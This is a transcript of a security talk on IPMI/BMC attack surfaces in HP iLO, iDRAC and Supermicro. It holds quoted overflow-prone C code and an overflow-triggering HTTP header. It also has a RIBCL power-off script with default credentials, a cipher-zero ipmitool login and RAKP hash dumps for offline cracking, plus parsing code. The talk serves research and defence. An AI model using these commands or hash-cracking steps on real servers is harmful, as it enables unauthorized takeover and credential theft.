The Unbearable Lightness of IPMI - cybercamp.es
TRANSCRIPT
The Unbearable Lightness of IPMI
Welcome to the infinite world of hardware
Who am I?
Nico Waisman, @nicowaisman
VP LATAM, Immunity, Inc (Immunity Argentina)
Researcher with a certain love for the heap
IPMI: Intelligent Platform Management Interface
IPMI
Independence from the operating system
Remote management
Monitoring: temperature, voltage, fans
IPMI
Full network stack
KVM
Serial console
Power management
(Or a backdoor)
As long as your server is plugged in, your IPMI is running.
The pleasure of auditing IPMI
PRE-AUTHENTICATION: we need to exploit it remotely
HP iLO 2: NEC V850, ThreadX
HP iLO 4: ARM, GHS INTEGRITY
IMM / iDRAC: SuperH, Linux
Supermicro: ARM, Linux
FUZZ: every CPU cycle you waste not fuzzing, God kills a kitten
READ THE DOCUMENTATION: that is where you find the gems
AUDIT: and everything you learn goes into the fuzzer!
Attack Surface
SMASH: TCP/22
SNMP: UDP/161,162
HTTPS: TCP/80,443
IPMI: UDP/623
Others: standalone WSMAN, KVM, VNC
SMASH
Command line standardized by the DMTF
Runs over SSH
Most of the potential attacks are post-authentication
TEXTCONS enables a remote console! :D
https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/
SNMP
Protocol for organizing and collecting information
Stateless protocol
"Authenticates" with a community string
Of HP iLO2, HP iLO4, Dell iDRAC and Lenovo IMMv2, 3 out of 4 used "public" as their community string

```shell
$ snmpwalk -v1 -c public 192.168.1.21
$ snmpwalk -v1 -c public -m "./immalert.mib" 192.168.1.129
```
HTTPS
One of the most interesting targets
Favored by sysadmins and firewalls, open by default
Most use appweb; however, some decided to implement their own server
HTTPS
Fabien Perigaud from Synacktiv:

```c
sscanf(heap_buf, "%*s %s", httpbuffer);   /* no width limit on %s: the header value is copied unbounded */
```

Triggerable with an HTTP header...

```
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
```

Supermicro /login.cgi:

```c
int main(void)
{
    char name[128], pwd[24];
    char *temp;
    // ... initialize ...
    temp = cgiGetVariable("name");
    strcpy(name, temp);   /* unbounded copy of an attacker-controlled field into a 128-byte stack buffer */
    temp = cgiGetVariable("pwd");
    strcpy(pwd, temp);    /* unbounded copy into a 24-byte stack buffer */
    // ... validate user ...
}
```

https://jhalderm.com/pub/papers/ipmi-woot13.pdf
HTTPS
URL/xmldata?item=all (HP iLO only)
URL/cgi-bin/discover (iDRAC only)
HTTPS
It also opens up the attack surface of other protocols: WS-MAN, Redfish, RIBCL
Redfish is a RESTful API created by the DMTF and supported by many IPMIs
It uses JSON
The endpoints live under /redfish/v1/
HTTPS
RIBCL lets you write XML scripts to configure the server, monitor its status, etc.
It uses the /RIBCL endpoint, which is reached without authenticating; the XML itself takes care of authentication
Administrators don't usually write their own XML; they use...
CPQLOCFG: connects to the endpoint
HPONCFG: creates a local XML
HTTPS

```xml
<RIBCL VERSION="2.0">
<LOGIN USER_LOGIN="ADMIN" PASSWORD="ADMIN">
<SERVER_INFO MODE="write">
<SET_HOST_POWER HOST_POWER="No"/>
</SERVER_INFO>
</LOGIN>
</RIBCL>
```

Powers the machine off
HTTPS
They use some kind of solid lexer. We spent a few radamsa cycles on it but gave up for a better target.

```shell
radamsa validcases/* -o testcases/case%n -n 10000
```

radamsa is always the first step
From valid examples to fuzz cases in 2 minutes
Includes a variety of mutators for fuzzing
HTTPS

```xml
<RIBCL VERSION="2.0"><LOGIN><RIBCL VERSION="2.0"><RIBCL VERSION="2.0">
<LOGIN USER_LOGIN="admin" PASSWORD="ADMIN">
<RIB_INFO MODE="write">
</RIB_INFO>
</LOGIN>
</RIBCL></LOGIN>
</RIBCL></LOGIN>
```
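A small review tool for RIBCL scripts, added here as an example (this is not HP or iLO code): it pulls the credentials and the write-mode operations out of a script like the power-off one above, and shows what a strict XML parser does with the radamsa mutation. The two documents from the slides are embedded; the read-only script and its credentials are constructed.

```python
"""Inspect RIBCL scripts bound for the unauthenticated /RIBCL endpoint.

Added example, not iLO or HP tooling code. It extracts the credentials a script
carries, the MODE of each *_INFO section and the commands inside it, and flags
write-mode and power changes; input that is not well-formed XML (such as the
radamsa mutation on the slide) is rejected by the parser rather than handled.
POWER_OFF_SCRIPT and RADAMSA_CASE are the two documents from the slides;
READ_ONLY_SCRIPT is constructed.
"""
import xml.etree.ElementTree as ET

POWER_OFF_SCRIPT = """<RIBCL VERSION="2.0">
<LOGIN USER_LOGIN="ADMIN" PASSWORD="ADMIN">
<SERVER_INFO MODE="write">
<SET_HOST_POWER HOST_POWER="No"/>
</SERVER_INFO>
</LOGIN>
</RIBCL>"""

RADAMSA_CASE = """<RIBCL VERSION="2.0"><LOGIN><RIBCL VERSION="2.0"><RIBCL VERSION="2.0">
<LOGIN USER_LOGIN="admin" PASSWORD="ADMIN">
<RIB_INFO MODE="write">
</RIB_INFO>
</LOGIN>
</RIBCL></LOGIN>
</RIBCL></LOGIN>"""

# Constructed read-only script for comparison
READ_ONLY_SCRIPT = """<RIBCL VERSION="2.0">
<LOGIN USER_LOGIN="auditor" PASSWORD="constructed">
<SERVER_INFO MODE="read">
<GET_HOST_POWER_STATUS/>
</SERVER_INFO>
</LOGIN>
</RIBCL>"""


def inspect_ribcl(xml_text: str) -> dict:
    """Parse a script and report who it logs in as and what it asks for.

    Raises ET.ParseError for malformed XML and ValueError for XML that is
    well-formed but not a RIBCL script."""
    root = ET.fromstring(xml_text)
    if root.tag != "RIBCL":
        raise ValueError("root element is %r, not RIBCL" % root.tag)
    login = root.find("LOGIN")
    if login is None:
        raise ValueError("no LOGIN element; the script carries no credentials")
    commands = []
    for section in login:                      # SERVER_INFO, RIB_INFO, USER_INFO, ...
        mode = section.get("MODE", "read").lower()
        for command in section:
            commands.append((section.tag, mode, command.tag, dict(command.attrib)))
    return {
        "version": root.get("VERSION"),
        "user": login.get("USER_LOGIN"),
        "has_password": login.get("PASSWORD") is not None,
        "write_sections": sorted({s.tag for s in login if s.get("MODE", "read").lower() == "write"}),
        "commands": commands,
    }


def classify(report: dict) -> list:
    """Review flags for one script."""
    flags = []
    if report["has_password"]:
        flags.append("embeds a cleartext password")
    for section, mode, command, attrs in report["commands"]:
        if mode == "write":
            flags.append(f"{section}/{command} in write mode")
        if command == "SET_HOST_POWER" and attrs.get("HOST_POWER", "").lower() == "no":
            flags.append("powers the host off")
    return flags


def try_inspect(xml_text: str):
    """Report for a well-formed script, None when the XML does not parse."""
    try:
        return inspect_ribcl(xml_text)
    except ET.ParseError:
        return None


if __name__ == "__main__":
    samples = [("power-off", POWER_OFF_SCRIPT), ("read-only", READ_ONLY_SCRIPT), ("radamsa", RADAMSA_CASE)]
    for name, doc in samples:
        report = try_inspect(doc)
        print(name, "->", classify(report) if report else "rejected: not well-formed XML")
```

The radamsa case fails at the first closing tag that does not match the element currently open, which is the behaviour the talk observed from the iLO side: a strict lexer gets rejection, not a crash, out of tag-level mutations.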
WSMAN
Web Services Management
Microsoft provides native support (WinRM)
Syntax similar to XML, with small variations (SOAP-based)
Widely used thanks to its PowerShell support
Not tied to a transport layer; generally over HTTP/HTTPS under the /wsman endpoint
But it can run standalone on tcp/5985
Running over a stateful protocol, it is more reliable than SNMP/IPMI
Authenticates with Basic Auth, Digest Auth, Kerberos
For INEXPLICABLE reasons, some IPMIs allow reaching the parser without authenticating
WSMAN
SuperMicro uses version 2.1.0
Vulnerable to more than one overflow
Get ready for a trip back to the 90s
But other IPMIs use newer versions...
IPMI
IPMIs have a protocol that is itself called IPMI, on UDP/623: a series of interfaces that let you do everything the interface provides
Including a serial console over UDP...
In 2013 the magazine ITWorld called it the most dangerous protocol in the world
Purely over UDP; it uses a SessionID and a sequence number to keep a minimum of state
IDENTIFYING IPMI: on an internal network (or not so internal)
IPMI v2.0 / RMCP+
Get Channel Authentication Capabilities request -> Get Channel Authentication Capabilities response

Request: <<Get Channel Authentication Capabilities>>

```
06 00 FF 07                      RMCP header: version, type (RMCP/ASF)
00 00 00 00 00 00 00 00 00 09    IPMI session header: authentication, sequence number, session, length
20 18 c8 81 00 38 8E 04 B5       IPMI message: command, required privileges
```

Response: <<Get Channel Authentication Capabilities>>

```
06 00 FF 07
00 00 00 00 00 00 00 00 00 10
81 1C 63 20 00 38 00 02 80 00 00 10 14 02 00 00
```

Compatibility: MD5, MD2, plaintext, NoAuth, null user, IPMI version
IPMI
Indicates the IPMI version (v2.0/v1.5) and OEM support
Authentication types: no authentication, MD2, MD5, IPMI v2.0, NULL USER
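The request and response above, rebuilt and decoded in Python as an added example (this is not code from the talk). Field offsets and bit meanings come from the IPMI v2.0 specification; the sample bytes are the ones on the slides. `audit_findings` turns the decoded capability bytes into the settings a defender would want flagged when inventorying BMCs.

```python
"""Build and decode the RMCP/IPMI "Get Channel Authentication Capabilities"
exchange from the slides, byte for byte.

Added example (not code from the talk). Field offsets and bit meanings follow
the IPMI v2.0 specification; the sample packets are the bytes on the slides.
"""
import struct

RMCP_HEADER = bytes.fromhex("0600ff07")  # version 0x06, reserved, sequence 0xFF (no ACK), class 0x07 = IPMI
BMC_ADDR = 0x20            # responder slave address of the BMC
CONSOLE_ADDR = 0x81        # software ID of the remote console
NETFN_APP_REQUEST = 0x06   # App network function; the response uses 0x07
CMD_GET_CHANNEL_AUTH_CAP = 0x38

# Auth Type Support byte: one bit per IPMI v1.5 authentication type
AUTH_TYPE_BITS = {0: "none", 1: "MD2", 2: "MD5", 4: "straight password", 5: "OEM"}

# The two packets shown on the slides
SLIDE_REQUEST = bytes.fromhex("0600ff07" "000000000000000000" "09" "2018c88100388e04b5")
SLIDE_RESPONSE = bytes.fromhex("0600ff07" "000000000000000000" "10" "811c6320003800028000001014020000")


def ipmi_checksum(data: bytes) -> int:
    """IPMI two's-complement checksum: (sum(data) + checksum) % 256 == 0."""
    return (-sum(data)) & 0xFF


def build_request(channel: int = 0x0E, privilege: int = 0x04, rq_seq: int = 0) -> bytes:
    """UDP payload for an unauthenticated (session auth type 0) request.

    channel 0x0E means "the channel this packet arrived on"; bit 7 asks for the
    IPMI v2.0+ extended data. privilege 0x04 is Administrator.
    """
    head = bytes([BMC_ADDR, NETFN_APP_REQUEST << 2])          # rsAddr, netFn/rsLUN
    head += bytes([ipmi_checksum(head)])                       # checksum 1
    body = bytes([CONSOLE_ADDR, rq_seq << 2, CMD_GET_CHANNEL_AUTH_CAP,
                  0x80 | channel, privilege])                  # rqAddr, rqSeq/rqLUN, cmd, data
    body += bytes([ipmi_checksum(body)])                       # checksum 2
    msg = head + body
    # IPMI v1.5 session header: auth type 0, sequence 0, session ID 0, payload length
    session = struct.pack("<BII", 0x00, 0, 0) + bytes([len(msg)])
    return RMCP_HEADER + session + msg


def parse_response(payload: bytes) -> dict:
    """Decode the response; raise ValueError for anything malformed."""
    if len(payload) < 14 or payload[:4] != RMCP_HEADER or payload[4] != 0x00:
        raise ValueError("not an unauthenticated RMCP/IPMI packet")
    length = payload[13]
    msg = payload[14:14 + length]
    if len(msg) != length or length < 16:
        raise ValueError("truncated IPMI message")
    if ipmi_checksum(msg[:2]) != msg[2] or ipmi_checksum(msg[3:-1]) != msg[-1]:
        raise ValueError("IPMI checksum mismatch")
    net_fn, cmd, completion = msg[1] >> 2, msg[5], msg[6]
    if net_fn != NETFN_APP_REQUEST + 1 or cmd != CMD_GET_CHANNEL_AUTH_CAP:
        raise ValueError("not a Get Channel Authentication Capabilities response")
    if completion != 0x00:
        raise ValueError("completion code %#04x" % completion)
    channel, auth_support, auth_status, ext_caps = msg[7:11]
    return {
        "channel": channel & 0x0F,
        "ipmi_v2_extended": bool(auth_support & 0x80),
        "auth_types": [name for bit, name in AUTH_TYPE_BITS.items() if auth_support & (1 << bit)],
        "anonymous_login": bool(auth_status & 0x01),
        "null_usernames": bool(auth_status & 0x02),
        "non_null_usernames": bool(auth_status & 0x04),
        "per_message_auth_disabled": bool(auth_status & 0x10),
        "ipmi_v1_5": bool(ext_caps & 0x01),
        "ipmi_v2_0": bool(ext_caps & 0x02),
        "oem_id": msg[11:14].hex(),
    }


def audit_findings(info: dict) -> list:
    """Settings a defender would want flagged in an inventory of BMCs."""
    findings = []
    if info["anonymous_login"]:
        findings.append("anonymous login enabled")
    if info["null_usernames"]:
        findings.append("null usernames enabled")
    if "none" in info["auth_types"]:
        findings.append("authentication type 'none' advertised")
    if "straight password" in info["auth_types"]:
        findings.append("plaintext password authentication advertised")
    return findings


if __name__ == "__main__":
    assert build_request() == SLIDE_REQUEST
    info = parse_response(SLIDE_RESPONSE)
    for key, value in info.items():
        print(f"{key:>26}: {value}")
    print("findings:", audit_findings(info) or "none")
```

Run stand-alone it checks that `build_request()` reproduces the slide's request byte for byte, including both IPMI checksums, and prints the decoded response. A checksum mismatch, a wrong netFn/command pair or a non-zero completion code raises ValueError instead of producing a half-parsed result, which matters when the same decoder is pointed at replies from many vendors' BMCs.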
IPMI
No authentication:

```shell
ipmitool -I lanplus -C0 -H IP -U root -P calvin sdr
```

* Part of Dan Farmer's great work!
IPMI v2.0 / RMCP+
Open Session Request / Open Session Response: local session ID, remote session ID
RAKP Message #1: username, local random value
RAKP Message #2: server random value, GUID, hashed password
RAKP Message #3 / RAKP Message #4: authentication code
Hash with RAKP-HMAC-SHA1, over the salt:
HMAC(LocalSessionID, RemoteSessionID, LocalRandomBytes, RemoteRandomBytes, RemoteGUID, Username)
* Part of Dan Farmer's great work!
IPMI

```
$ python dump_RAKP.py 10.10.0.3
Found: 10.10.0.3 admin:$rakp$54414378432c5a416a7368a6b17c8288471355413cd1659b792400002f570000b85f0000f63a000036353430383155534533333845584236140561646d696e$6668a4a555989a3831e901ab85087a885b9bb91f
Found: 10.10.0.3 ADMIN:$rakp$544143787366cf39332ceb225659e645390b66a8776af6751658000082470000f60400000820000036353430383155534533333845584236140541444d494e$74487c1803039a45c20e085284a10bda38c75b79
```

It can be cracked with john or hashcat
$24.48 per hour on AWS
https://medium.com/@iraklis/running-hashcat-v4-0-0-in-amazons-aws-new-p3-16xlarge-instance-e8fab4541e9b
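What the `$rakp$` lines above actually contain, as an added example (this is not the talk's dump_RAKP.py): the salt is split into the RAKP Message 1/2 fields defined by the IPMI v2.0 specification, and the authentication code is recomputed as HMAC-SHA1 keyed with a candidate password, which is the construction the slide writes as HMAC(...). The first line from the slide is used as sample input; every password that appears below is constructed.

```python
"""Take apart a "$rakp$<salt>$<hmac>" line such as the ones dump_RAKP.py prints
and show what RAKP Message 2 gives away to a client that never authenticated.

Added example, not the talk's dump_RAKP.py. The salt is laid out as the IPMI
v2.0 RAKP-HMAC-SHA1 input: SIDm | SIDc | Rm | Rc | GUIDc | ROLEm | ULength |
UName, and the authentication code is HMAC-SHA1 keyed with the user's password.
SLIDE_LINE is the first line from the slide; the passwords used are constructed.
"""
import hashlib
import hmac
from collections import namedtuple

Rakp2Fields = namedtuple(
    "Rakp2Fields",
    "sid_console sid_bmc rand_console rand_bmc guid_bmc role ulength username",
)

SLIDE_LINE = (
    "admin:$rakp$54414378432c5a416a7368a6b17c8288471355413cd1659b792400002f570000"
    "b85f0000f63a000036353430383155534533333845584236140561646d696e"
    "$6668a4a555989a3831e901ab85087a885b9bb91f"
)


def parse_rakp_line(line: str):
    """'user:$rakp$<salt hex>$<hmac hex>' -> (user, salt bytes, hmac hex)."""
    user, sep, hash_part = line.partition(":")
    if not sep or not hash_part.startswith("$rakp$"):
        raise ValueError("not a $rakp$ line")
    salt_hex, sep, mac_hex = hash_part[len("$rakp$"):].partition("$")
    if not sep or len(mac_hex) != 40:
        raise ValueError("expected <salt>$<20-byte hmac>")
    return user, bytes.fromhex(salt_hex), mac_hex.lower()


def decode_salt(salt: bytes) -> Rakp2Fields:
    """Split the salt into the RAKP 1/2 fields it was built from."""
    fixed = 4 + 4 + 16 + 16 + 16 + 1 + 1   # everything before the username
    if len(salt) < fixed:
        raise ValueError("salt shorter than the fixed RAKP fields")
    ulength = salt[57]
    if len(salt) != fixed + ulength:
        raise ValueError("salt length disagrees with ULength")
    return Rakp2Fields(
        sid_console=salt[0:4],      # SIDm: remote console session ID
        sid_bmc=salt[4:8],          # SIDc: BMC session ID
        rand_console=salt[8:24],    # Rm: remote console random number
        rand_bmc=salt[24:40],       # Rc: BMC random number
        guid_bmc=salt[40:56],       # GUIDc: BMC GUID
        role=salt[56],              # ROLEm: requested privilege / lookup bits
        ulength=ulength,
        username=salt[58:].decode("ascii", errors="replace"),
    )


def rakp2_auth_code(password: str, salt: bytes) -> str:
    """Key exchange authentication code of RAKP Message 2 (RAKP-HMAC-SHA1).

    The key is the user's password (Kuid). HMAC zero-pads keys shorter than the
    block size, so the specification's 20-byte padding changes nothing here."""
    return hmac.new(password.encode(), salt, hashlib.sha1).hexdigest()


def password_matches(line: str, candidate: str) -> bool:
    """Verify one candidate against a captured line. Everything except the
    password is in the packet, which is why the check works offline."""
    _, salt, mac_hex = parse_rakp_line(line)
    return hmac.compare_digest(rakp2_auth_code(candidate, salt), mac_hex)


def describe(line: str) -> dict:
    """Human-readable view of what the BMC disclosed."""
    user, salt, mac_hex = parse_rakp_line(line)
    f = decode_salt(salt)
    return {
        "user": user,
        "console_session_id": f.sid_console.hex(),
        "bmc_session_id": f.sid_bmc.hex(),
        "bmc_random": f.rand_bmc.hex(),
        "bmc_guid": f.guid_bmc.hex(),
        "bmc_guid_ascii": f.guid_bmc.decode("ascii", errors="replace"),
        "requested_privilege": f.role & 0x0F,
        "username_in_salt": f.username,
        "auth_code": mac_hex,
    }


if __name__ == "__main__":
    for key, value in describe(SLIDE_LINE).items():
        print(f"{key:>20}: {value}")
    # constructed guess, expected not to match
    print("constructed guess matches:", password_matches(SLIDE_LINE, "constructed-wrong-guess"))
```

For the slide's line the GUID field decodes to printable ASCII and the role byte requests Administrator privilege. `password_matches` is the whole reason the hash is an offline problem: the BMC hands over the salt and the HMAC before the client has proven anything, so the only unknown in the computation is the password itself.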
IPMI
Dell iDRAC made the mistake of not making the SessionIDs random: it used a format with half of the characters fixed, 0x0200XXYY
As a result, they could be predicted and commands injected
* https://labs.mwrinfosecurity.com/blog/cve-2014-8272/
KVM
Listens on port TCP/17990
Used by the Java applet inside the web interface
TODO
In the WILD!
LATERAL MOVEMENT, or how to move with impunity through the DMZs
#1 Hacking the sysadmin
#2 Hacking an IPMI
#3 Hacking the server from the internet
IPMI
Once the IPMI is hacked, can we access the server?
Yes! In many ways!
Serial console
Mounting a DVD remotely
KVM (VNC, proprietary protocol, etc.)
#2 Hacking an IPMI
IPMI
Once the server is hacked... can we access the IPMI?
Yes! In many ways!
The operating system driver lets you create users
The driver lets you flash firmware
IPMI

```
root@xdev:~# ./CP018561.scexe
FLASH_iLO3 v1.09 for Linux (Jan 23 2013)
(C) Copyright 2002-2013 Hewlett-Packard Development Company, L.P.
Firmware image: ilo3_155.bin
Current iLO 3 firmware version 1.26; Serial number ILOUSE116ND7G
Component XML file: CP018561.xml
CP018561.xml reports firmware version 1.55
This operation will update the firmware on the
iLO 3 in this server with version 1.55.
Continue (y/N)?y
Current firmware is 1.26 (Aug 26 2011 )
Firmware image is 0x801664(8394340) bytes
Committing to flash part...
******** DO NOT INTERRUPT! ********
Flashing completed.
Attempting to reset device. Succeeded.
***** iLO 3 reboot in progress (may take up to 60 seconds.)
***** Please ignore console messages, if any.
iLO 3 reboot completed.
root@xdev:~#
```
#3 Hacking the server from the internet
A LOT remains to be analyzed
IPMI
Several pending and proprietary protocols
Developing exploits for the bugs found, remotely
Alternatives for lateral movement
Tools for mass server management
Privilege escalation
CAREFUL!!
Questions? @nicowaisman
It is never one person, but a team. Thanks: Matias, Oren, rod, ivan, juan
@nicowaisman